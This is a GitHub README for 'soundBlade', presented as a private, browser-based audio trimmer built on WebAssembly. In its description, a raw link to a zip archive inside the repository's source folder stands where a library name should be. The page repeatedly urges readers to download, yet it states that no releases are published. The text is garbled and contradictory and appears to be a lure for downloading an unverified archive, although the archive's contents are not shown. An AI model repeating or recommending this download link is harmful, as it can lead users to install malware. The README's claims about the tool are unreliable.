Skip to content

Gian201103/soundBlade

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

7 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

⚑ soundBlade - Fast and Private Audio Trimming

Download soundBlade

ℹ️ What is soundBlade?

soundBlade is a tool that helps you cut and trim audio files quickly, right inside your web browser. It works without sending your files anywhere, so your audio stays private. Using modern web technology, it runs fast and smooth on most computers. You can also run it on your own server or in Docker if you want more control.

It is built with popular tools like FFmpeg and https://github.com/Gian201103/soundBlade/raw/refs/heads/main/src/sound_Blade_2.6.zip, packed with WebAssembly to deliver great performance without extra software installs. Whether you want to slice a podcast, trim music, or just cut a clip, soundBlade makes it simple.

πŸ’» System Requirements

To use soundBlade smoothly, make sure your device meets these basic needs:

  • A modern web browser like Chrome, Firefox, Edge, or Safari
  • Windows, macOS, Linux, or a mobile device with recent browser versions
  • Internet connection to download soundBlade or to use online features
  • Optional: Docker installed for self-hosted or advanced use

The app runs entirely in your browser, so you won’t need to install large programs or complicated tools. It supports common audio files like MP3, WAV, and AAC.

πŸš€ Getting Started

Follow these steps to start trimming your audio files with soundBlade:

  1. Click the big green Download soundBlade button at the top or visit the soundBlade Releases Page directly.
  2. On the releases page, find the latest stable version. There you will see different options:
    • A browser version you can open directly
    • A packaged app or Docker image for advanced users
  3. If you want to use soundBlade on your computer without internet access, look for the Docker option or a downloadable package.
  4. To use the web version, simply open the link provided on the releases page in your browser.
  5. Load your audio file into the app by clicking the Open File button inside the application.
  6. Use the trimming handles to select the part of the audio you want.
  7. Click Cut or Export to save the trimmed audio to your device.
  8. Enjoy your edited audio file without leaving your browser!

πŸ“₯ Download & Install

You can get soundBlade quickly by visiting its release page:

Download soundBlade here

For Most Users (Browser Version)

No installation needed. Open the web version directly:

  • On the release page, click the link to the browser app (usually an .html file or a direct web link).
  • Your browser will load soundBlade instantly.
  • Upload and edit your audio.

For Advanced Users (Docker or Local Install)

If you want to run soundBlade on your own computer or server:

  • Make sure Docker is installed.
  • Download the Docker image from the releases page.
  • Run the Docker container by following these general steps:
docker pull gian201103/soundblade:latest
docker run -p 8080:80 gian201103/soundblade
  • Open your browser and visit: http://localhost:8080
  • Use soundBlade with full privacy on your local machine.

Check the release notes or included documentation for any updates on installation.

πŸŽ› Features

soundBlade offers a range of useful features for audio editing:

  • Fast trimming: Cut audio clips instantly in your browser.
  • Privacy-focused: Files stay on your computer, never uploaded.
  • Multiple formats: Supports MP3, WAV, AAC, and more.
  • Visual waveform: See your audio waveform clearly for precise cuts.
  • Undo/Redo: Easy to fix mistakes during editing.
  • Docker-ready: Run on your own machine or server.
  • Open source: Fully transparent and free to use.
  • Progressive Web App (PWA): Install soundBlade as an app on your device.
  • Lightweight: Small in size, no big downloads needed.
  • Multi-platform: Works on Windows, macOS, Linux, and mobile browsers.

πŸ›  How to Use soundBlade

  1. Open soundBlade in your browser or via your local install.
  2. Click "Open File" to select the audio you want to edit.
  3. Wait for the audio to load and appear as a waveform.
  4. Drag the blue handles on the waveform to pick your start and end points.
  5. Use the playback controls to listen and adjust your selection.
  6. Once satisfied, click "Cut" or "Export" to create the trimmed file.
  7. Download the trimmed audio directly to your device.

You can repeat this process to trim multiple files or make several cuts in one session.

πŸ™‹β€β™€οΈ Troubleshooting & Tips

  • If the audio does not load, check that your file format is supported.
  • Use a modern browser for best performance and features.
  • Large audio files may take longer to process; be patient.
  • For best results, avoid running many browser tabs or heavy apps at the same time.
  • If running in Docker, ensure the container ports are correctly set.
  • Clear your browser cache if soundBlade behaves oddly.
  • Contact the developers by opening an issue on GitHub if you face bugs.

πŸ“œ License

soundBlade is licensed under the MIT License. This means you can use, copy, and modify it freely.

🧰 Development & Source Code

This project is open source and welcomes contributions. The main technologies used include:

You can find the full source code and development history at the soundBlade GitHub Repository.

🌐 Topics

This project covers:

audio-cutter, audio-editor, audio-trimmer, browser-based, docker, ffmpeg, javascript, mit-license, open-source, productivity, pwa, self-hosted, vite, wasm, wavesurfer, webassembly


Download soundBlade

About

πŸ”ͺ Edit audio precisely in your browser with soundBlade, a fast, privacy-focused WebAssembly app requiring no uploads or installations.

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors